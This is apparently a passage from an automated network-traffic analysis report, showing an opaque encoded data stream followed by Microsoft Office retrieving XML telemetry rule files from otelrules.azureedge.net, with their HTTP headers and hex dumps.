                                                                                                                                                                                                2024-11-20 09:54:21 UTC1369INData Raw: 54 46 62 50 58 52 2f 63 6e 50 36 52 61 34 44 44 2b 51 58 41 6c 77 54 50 38 58 42 6b 4d 38 6c 57 4c 36 56 2f 41 6b 71 61 63 2b 55 66 45 75 78 75 4a 66 54 53 37 39 5a 2b 79 4d 6a 79 56 35 58 53 44 63 33 2f 65 32 77 73 78 46 59 69 6f 7a 39 4b 41 70 56 73 71 55 6c 63 32 56 55 54 31 35 7a 2f 6b 47 36 4d 7a 76 6f 54 77 5a 56 4d 69 37 68 79 63 48 36 53 42 41 53 6e 4a 56 5a 49 73 32 43 6c 51 45 4c 64 52 6c 4c 49 33 4f 6e 59 59 49 53 50 70 6c 66 4a 6d 51 62 4d 2b 33 78 73 4d 38 70 4e 49 36 30 33 51 51 4b 50 61 71 39 56 56 73 35 63 48 64 32 57 2b 4a 52 6f 68 4d 76 73 48 49 33 63 54 4d 4c 67 4e 54 42 2b 36 6b 38 36 68 79 31 65 53 6f 49 6c 76 41 64 56 78 78 31 4b 6c 35 76 38 6d 57 61 43 79 66 55 53 77 4a 49 4a 7a 2f 39 35 61 44 37 4a 51 69 71 70 4e 30 51 47 6b 57 69
                                                                                                                                                                                                Data Ascii: TFbPXR/cnP6Ra4DD+QXAlwTP8XBkM8lWL6V/Akqac+UfEuxuJfTS79Z+yMjyV5XSDc3/e2wsxFYioz9KApVsqUlc2VUT15z/kG6MzvoTwZVMi7hycH6SBASnJVZIs2ClQELdRlLI3OnYYISPplfJmQbM+3xsM8pNI603QQKPaq9VVs5cHd2W+JRohMvsHI3cTMLgNTB+6k86hy1eSoIlvAdVxx1Kl5v8mWaCyfUSwJIJz/95aD7JQiqpN0QGkWi
                                                                                                                                                                                                2024-11-20 09:54:21 UTC1369INData Raw: 31 59 55 32 5a 50 32 6c 47 72 49 67 62 34 51 31 64 4a 55 68 64 39 76 5a 54 6a 64 56 52 6d 6a 50 78 31 4b 67 69 57 38 42 31 58 48 48 55 71 58 6e 2f 79 53 61 6f 33 4c 39 68 44 4f 6b 77 44 42 39 58 68 73 4e 38 35 42 50 72 59 35 51 67 71 53 5a 61 70 4c 51 4d 56 59 45 74 76 53 76 74 68 67 6b 49 2b 6d 56 2f 79 46 44 49 58 6e 4f 33 46 2b 7a 55 68 73 2f 48 39 44 42 34 39 6e 71 6b 64 54 79 46 6b 5a 30 4a 54 32 6d 57 53 4e 7a 50 73 52 7a 4a 49 41 7a 2f 39 39 59 6a 44 48 51 69 69 69 4f 51 78 45 33 57 79 39 42 77 71 4c 62 78 2f 5a 6d 2f 4f 65 61 70 37 6e 7a 31 66 53 33 42 57 46 2f 33 6b 6f 5a 6f 70 41 4a 36 77 7a 53 51 4b 59 61 71 31 4e 57 73 52 53 41 4e 61 64 2b 5a 39 73 68 63 44 77 45 73 4f 41 43 38 37 7a 66 57 45 77 7a 41 52 69 35 44 68 55 53 73 55 72 6b 30 52 63
                                                                                                                                                                                                Data Ascii: 1YU2ZP2lGrIgb4Q1dJUhd9vZTjdVRmjPx1KgiW8B1XHHUqXn/ySao3L9hDOkwDB9XhsN85BPrY5QgqSZapLQMVYEtvSvthgkI+mV/yFDIXnO3F+zUhs/H9DB49nqkdTyFkZ0JT2mWSNzPsRzJIAz/99YjDHQiiiOQxE3Wy9BwqLbx/Zm/Oeap7nz1fS3BWF/3koZopAJ6wzSQKYaq1NWsRSANad+Z9shcDwEsOAC87zfWEwzARi5DhUSsUrk0Rc
                                                                                                                                                                                                2024-11-20 09:54:21 UTC1369INData Raw: 4f 63 34 70 6c 6f 79 49 47 2b 45 4e 58 53 56 49 58 4a 59 32 38 35 78 51 59 46 6f 79 52 4e 41 4a 35 67 71 51 64 4e 68 55 52 53 30 4a 36 77 77 43 65 46 77 2f 4d 54 33 35 34 4d 78 66 46 79 59 69 7a 46 53 79 47 6e 50 30 6b 59 6e 48 6d 71 54 46 66 49 57 52 33 59 6e 76 69 53 4a 38 61 50 2b 51 2b 4e 79 6b 7a 70 2b 32 52 69 66 4f 31 65 4f 71 4d 7a 58 51 47 51 5a 2b 56 59 48 4e 49 64 46 64 76 53 71 4e 68 6e 69 63 4c 73 45 73 79 59 42 73 6a 77 65 6d 30 37 78 55 41 6f 72 7a 46 65 42 4a 4a 72 6f 30 78 54 7a 6c 34 5a 33 5a 7a 35 69 69 66 47 6a 2f 6b 50 6a 63 70 4d 37 2b 4e 30 5a 54 4b 49 61 69 65 79 4f 41 34 72 6b 32 43 69 53 30 53 4c 51 6c 7a 4f 30 76 65 55 4a 39 43 50 39 78 6e 42 6b 51 76 4e 38 48 42 6f 4e 63 70 4c 4a 71 6f 34 58 67 43 52 59 62 64 49 55 63 5a 5a 48
                                                                                                                                                                                                Data Ascii: Oc4ployIG+ENXSVIXJY285xQYFoyRNAJ5gqQdNhURS0J6wwCeFw/MT354MxfFyYizFSyGnP0kYnHmqTFfIWR3YnviSJ8aP+Q+Nykzp+2RifO1eOqMzXQGQZ+VYHNIdFdvSqNhnicLsEsyYBsjwem07xUAorzFeBJJro0xTzl4Z3Zz5iifGj/kPjcpM7+N0ZTKIaieyOA4rk2CiS0SLQlzO0veUJ9CP9xnBkQvN8HBoNcpLJqo4XgCRYbdIUcZZH
                                                                                                                                                                                                2024-11-20 09:54:21 UTC1369INData Raw: 59 59 49 53 50 70 6c 66 4e 6c 67 44 47 2f 33 74 6e 4d 38 56 44 4a 36 73 31 51 68 69 53 62 71 31 4c 57 73 5a 50 47 4e 32 41 2b 5a 46 71 68 73 66 73 46 49 33 63 54 4d 4c 67 4e 54 42 2b 2b 45 34 76 71 43 6c 42 42 64 31 30 36 31 34 53 7a 46 46 53 6a 39 4c 69 69 6d 65 44 7a 2f 6b 5a 33 35 4d 45 79 76 4a 31 62 6a 58 41 52 79 57 67 4d 55 55 4d 6e 47 61 6b 52 6c 4c 4f 58 52 76 46 6e 37 44 57 4a 34 2f 58 76 6b 2b 4e 70 51 44 4f 79 58 5a 2b 66 74 55 4b 4e 65 51 34 51 45 72 46 4b 36 52 56 58 38 4e 5a 45 74 71 55 2b 35 6c 6d 69 38 2f 2b 46 4d 32 58 42 38 72 2b 63 6d 55 30 77 30 30 2b 72 44 74 65 43 70 46 76 35 51 6b 53 7a 45 56 53 6a 39 4c 41 6d 32 79 45 7a 2f 4d 43 6a 59 31 43 33 4c 68 79 5a 48 36 53 42 43 53 76 4e 45 6f 42 6e 6d 69 72 54 46 6a 45 55 68 6a 52 6c 50
                                                                                                                                                                                                Data Ascii: YYISPplfNlgDG/3tnM8VDJ6s1QhiSbq1LWsZPGN2A+ZFqhsfsFI3cTMLgNTB++E4vqClBBd10614SzFFSj9LiimeDz/kZ35MEyvJ1bjXARyWgMUUMnGakRlLOXRvFn7DWJ4/Xvk+NpQDOyXZ+ftUKNeQ4QErFK6RVX8NZEtqU+5lmi8/+FM2XB8r+cmU0w00+rDteCpFv5QkSzEVSj9LAm2yEz/MCjY1C3LhyZH6SBCSvNEoBnmirTFjEUhjRlP
                                                                                                                                                                                                2024-11-20 09:54:21 UTC1369INData Raw: 78 50 4a 56 7a 4a 38 63 77 72 67 37 4b 44 69 4b 48 48 7a 71 66 30 67 62 33 54 50 31 46 51 6d 65 44 6b 57 48 77 4f 2f 57 66 73 6a 5a 76 6b 2b 66 33 45 7a 58 75 43 30 6f 65 63 6c 57 50 71 49 38 57 67 6e 61 56 5a 74 6e 57 63 64 65 48 74 61 56 73 4e 59 6e 68 34 2b 6d 4c 6f 32 52 48 74 65 33 5a 48 34 7a 32 6b 4e 67 72 43 35 42 42 74 30 6c 35 51 74 57 77 46 45 58 30 49 4b 2f 69 6e 65 44 77 2b 68 62 79 59 42 4d 69 37 68 6b 59 7a 48 59 53 69 76 72 4c 6c 6f 48 6a 57 69 67 51 42 37 44 54 42 2f 62 30 72 37 59 63 6f 50 44 2b 42 72 59 33 52 33 54 2b 32 4e 76 63 73 4a 56 49 61 68 2f 63 30 54 64 63 2b 55 66 45 76 35 65 48 4e 6d 56 35 6f 6b 71 71 4d 54 79 46 4d 47 54 43 34 57 32 4e 57 35 2b 6b 68 64 69 35 44 74 64 53 73 55 37 39 78 77 48 6d 41 70 43 68 59 32 2b 67 53 65
                                                                                                                                                                                                Data Ascii: xPJVzJ8cwrg7KDiKHHzqf0gb3TP1FQmeDkWHwO/WfsjZvk+f3EzXuC0oeclWPqI8WgnaVZtnWcdeHtaVsNYnh4+mLo2RHte3ZH4z2kNgrC5BBt0l5QtWwFEX0IK/ineDw+hbyYBMi7hkYzHYSivrLloHjWigQB7DTB/b0r7YcoPD+BrY3R3T+2NvcsJVIah/c0Tdc+UfEv5eHNmV5okqqMTyFMGTC4W2NW5+khdi5DtdSsU79xwHmApChY2+gSe
                                                                                                                                                                                                2024-11-20 09:54:21 UTC1369INData Raw: 35 37 63 54 4e 65 34 4c 53 68 35 78 45 6b 74 70 7a 46 50 47 49 39 74 70 6c 46 52 6a 47 4d 73 38 70 2f 39 6e 57 6d 50 38 63 41 32 78 34 49 42 79 76 39 4c 56 67 6e 62 51 7a 7a 6d 47 55 38 63 6e 69 76 72 42 30 71 4c 42 56 4c 32 6d 4f 43 56 61 49 2b 50 73 46 66 4a 30 6c 53 46 33 58 68 6c 4f 38 52 44 62 6f 55 31 58 41 65 53 62 4f 55 4a 45 73 63 64 53 70 65 54 2b 6f 68 71 68 38 69 79 45 4e 65 56 54 49 75 34 65 79 68 6d 69 6b 55 6d 74 44 4a 44 44 64 46 74 71 30 6b 53 31 42 4d 4c 6c 34 53 77 77 44 54 47 6a 2b 78 58 6c 64 4a 4c 79 2f 56 30 61 7a 44 4a 56 6a 36 69 50 46 6f 4a 32 6c 57 62 59 6c 2f 47 57 42 7a 51 72 4d 36 35 62 5a 6a 43 38 52 43 50 73 67 76 54 2b 30 74 57 43 64 74 44 50 4f 59 5a 54 78 79 65 4b 2b 73 48 53 6f 73 46 55 76 61 59 34 4a 56 6f 6a 34 33 65
                                                                                                                                                                                                Data Ascii: 57cTNe4LSh5xEktpzFPGI9tplFRjGMs8p/9nWmP8cA2x4IByv9LVgnbQzzmGU8cnivrB0qLBVL2mOCVaI+PsFfJ0lSF3XhlO8RDboU1XAeSbOUJEscdSpeT+ohqh8iyENeVTIu4eyhmikUmtDJDDdFtq0kS1BMLl4SwwDTGj+xXldJLy/V0azDJVj6iPFoJ2lWbYl/GWBzQrM65bZjC8RCPsgvT+0tWCdtDPOYZTxyeK+sHSosFUvaY4JVoj43e


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                23192.168.2.74972813.107.246.45443
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                2024-11-20 09:54:21 UTC192OUTGET /rules/rule120627v0s19.xml HTTP/1.1
                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                Host: otelrules.azureedge.net
                                                                                                                                                                                                2024-11-20 09:54:21 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                Date: Wed, 20 Nov 2024 09:54:21 GMT
                                                                                                                                                                                                Content-Type: text/xml
                                                                                                                                                                                                Content-Length: 404
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                Last-Modified: Tue, 09 Apr 2024 00:25:54 GMT
                                                                                                                                                                                                ETag: "0x8DC582B9E8EE0F3"
                                                                                                                                                                                                x-ms-request-id: 70a27cfc-201e-0051-268c-3a7340000000
                                                                                                                                                                                                x-ms-version: 2018-03-28
                                                                                                                                                                                                x-azure-ref: 20241120T095421Z-185f5d8b95cp7lkfhC1NYC7rpw0000000a4g00000000bt8a
                                                                                                                                                                                                x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                X-Cache: TCP_HIT
                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                2024-11-20 09:54:21 UTC404INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 4e 6e 5d 5b 45 65 5d 5b 43 63 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20 20 3c 53
                                                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120627" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120625" /> <SR T="2" R="^([Nn][Ee][Cc])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true"> <S


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                24192.168.2.74972613.107.246.45443
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                2024-11-20 09:54:21 UTC192OUTGET /rules/rule120625v0s19.xml HTTP/1.1
                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                Host: otelrules.azureedge.net
                                                                                                                                                                                                2024-11-20 09:54:21 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                Date: Wed, 20 Nov 2024 09:54:21 GMT
                                                                                                                                                                                                Content-Type: text/xml
                                                                                                                                                                                                Content-Length: 419
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                Last-Modified: Tue, 09 Apr 2024 00:25:42 GMT
                                                                                                                                                                                                ETag: "0x8DC582B9748630E"
                                                                                                                                                                                                x-ms-request-id: 0f1ce2f4-701e-0001-5e8c-3ab110000000
                                                                                                                                                                                                x-ms-version: 2018-03-28
                                                                                                                                                                                                x-azure-ref: 20241120T095421Z-1777c6cb754vxwc9hC1TEBykgw00000009a000000000hd7m
                                                                                                                                                                                                x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                X-Cache: TCP_HIT
                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                2024-11-20 09:54:21 UTC419INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 46 66 5d 5b 55 75 5d 5b 4a 6a 5d 5b 49 69 5d 5b 54 74 5d 5b 53 73 5d 5b 55 75 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d
                                                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120625" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120623" /> <SR T="2" R="([Ff][Uu][Jj][Ii][Tt][Ss][Uu])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                25192.168.2.74972713.107.246.45443
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                2024-11-20 09:54:21 UTC192OUTGET /rules/rule120626v0s19.xml HTTP/1.1
                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                Host: otelrules.azureedge.net
                                                                                                                                                                                                2024-11-20 09:54:21 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                Date: Wed, 20 Nov 2024 09:54:21 GMT
                                                                                                                                                                                                Content-Type: text/xml
                                                                                                                                                                                                Content-Length: 472
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                Last-Modified: Tue, 09 Apr 2024 00:25:53 GMT
                                                                                                                                                                                                ETag: "0x8DC582B9DACDF62"
                                                                                                                                                                                                x-ms-request-id: 107b228c-c01e-00a2-1f8c-3a2327000000
                                                                                                                                                                                                x-ms-version: 2018-03-28
                                                                                                                                                                                                x-azure-ref: 20241120T095421Z-185f5d8b95cp7lkfhC1NYC7rpw0000000a2g00000000hm41
                                                                                                                                                                                                x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                X-Cache: TCP_HIT
                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                2024-11-20 09:54:21 UTC472INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120626" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120625" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                26192.168.2.74972913.107.246.45443
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                2024-11-20 09:54:21 UTC192OUTGET /rules/rule120628v0s19.xml HTTP/1.1
                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                Host: otelrules.azureedge.net
                                                                                                                                                                                                2024-11-20 09:54:21 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                Date: Wed, 20 Nov 2024 09:54:21 GMT
                                                                                                                                                                                                Content-Type: text/xml
                                                                                                                                                                                                Content-Length: 468
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                Last-Modified: Tue, 09 Apr 2024 00:25:51 GMT
                                                                                                                                                                                                ETag: "0x8DC582B9C8E04C8"
                                                                                                                                                                                                x-ms-request-id: 70a27cfa-201e-0051-248c-3a7340000000
                                                                                                                                                                                                x-ms-version: 2018-03-28
                                                                                                                                                                                                x-azure-ref: 20241120T095421Z-r1d97b99577n5jhbhC1TEB74vn00000008qg000000004qmu
                                                                                                                                                                                                x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                X-Cache: TCP_HIT
                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                2024-11-20 09:54:21 UTC468INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120628" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120627" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                27192.168.2.74973013.107.246.45443
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                2024-11-20 09:54:21 UTC192OUTGET /rules/rule120629v0s19.xml HTTP/1.1
                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                Host: otelrules.azureedge.net
                                                                                                                                                                                                2024-11-20 09:54:21 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                Date: Wed, 20 Nov 2024 09:54:21 GMT
                                                                                                                                                                                                Content-Type: text/xml
                                                                                                                                                                                                Content-Length: 428
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                Last-Modified: Tue, 09 Apr 2024 00:26:17 GMT
                                                                                                                                                                                                ETag: "0x8DC582BAC4F34CA"
                                                                                                                                                                                                x-ms-request-id: 947c7cf8-001e-00a2-018c-3ad4d5000000
                                                                                                                                                                                                x-ms-version: 2018-03-28
                                                                                                                                                                                                x-azure-ref: 20241120T095421Z-1777c6cb754lv4cqhC1TEB13us00000009dg000000007g62
                                                                                                                                                                                                x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                X-Cache: TCP_HIT
                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                2024-11-20 09:54:21 UTC428INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4d 6d 5d 5b 49 69 5d 5b 43 63 5d 5b 52 72 5d 5b 4f 6f 5d 2d 5b 53 73 5d 5b 54 74 5d 5b 41 61 5d 5b 52 72 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22
                                                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120629" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120627" /> <SR T="2" R="([Mm][Ii][Cc][Rr][Oo]-[Ss][Tt][Aa][Rr])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W"


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                28192.168.2.74973113.107.246.45443
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                2024-11-20 09:54:22 UTC192OUTGET /rules/rule120630v0s19.xml HTTP/1.1
                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                Host: otelrules.azureedge.net
                                                                                                                                                                                                2024-11-20 09:54:22 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                Date: Wed, 20 Nov 2024 09:54:22 GMT
                                                                                                                                                                                                Content-Type: text/xml
                                                                                                                                                                                                Content-Length: 499
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                Last-Modified: Tue, 09 Apr 2024 00:25:45 GMT
                                                                                                                                                                                                ETag: "0x8DC582B98CEC9F6"
                                                                                                                                                                                                x-ms-request-id: be70ec4e-301e-000c-088c-3a323f000000
                                                                                                                                                                                                x-ms-version: 2018-03-28
                                                                                                                                                                                                x-azure-ref: 20241120T095422Z-r1d97b99577n4dznhC1TEBc1qw00000008rg000000006cg5
                                                                                                                                                                                                x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                X-Cache: TCP_HIT
                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                2024-11-20 09:54:22 UTC499INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120630" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120629" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                29192.168.2.74973213.107.246.45443
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                2024-11-20 09:54:22 UTC192OUTGET /rules/rule120631v0s19.xml HTTP/1.1
                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                Host: otelrules.azureedge.net
                                                                                                                                                                                                2024-11-20 09:54:22 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                Date: Wed, 20 Nov 2024 09:54:22 GMT
                                                                                                                                                                                                Content-Type: text/xml
                                                                                                                                                                                                Content-Length: 415
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                Last-Modified: Tue, 09 Apr 2024 00:25:44 GMT
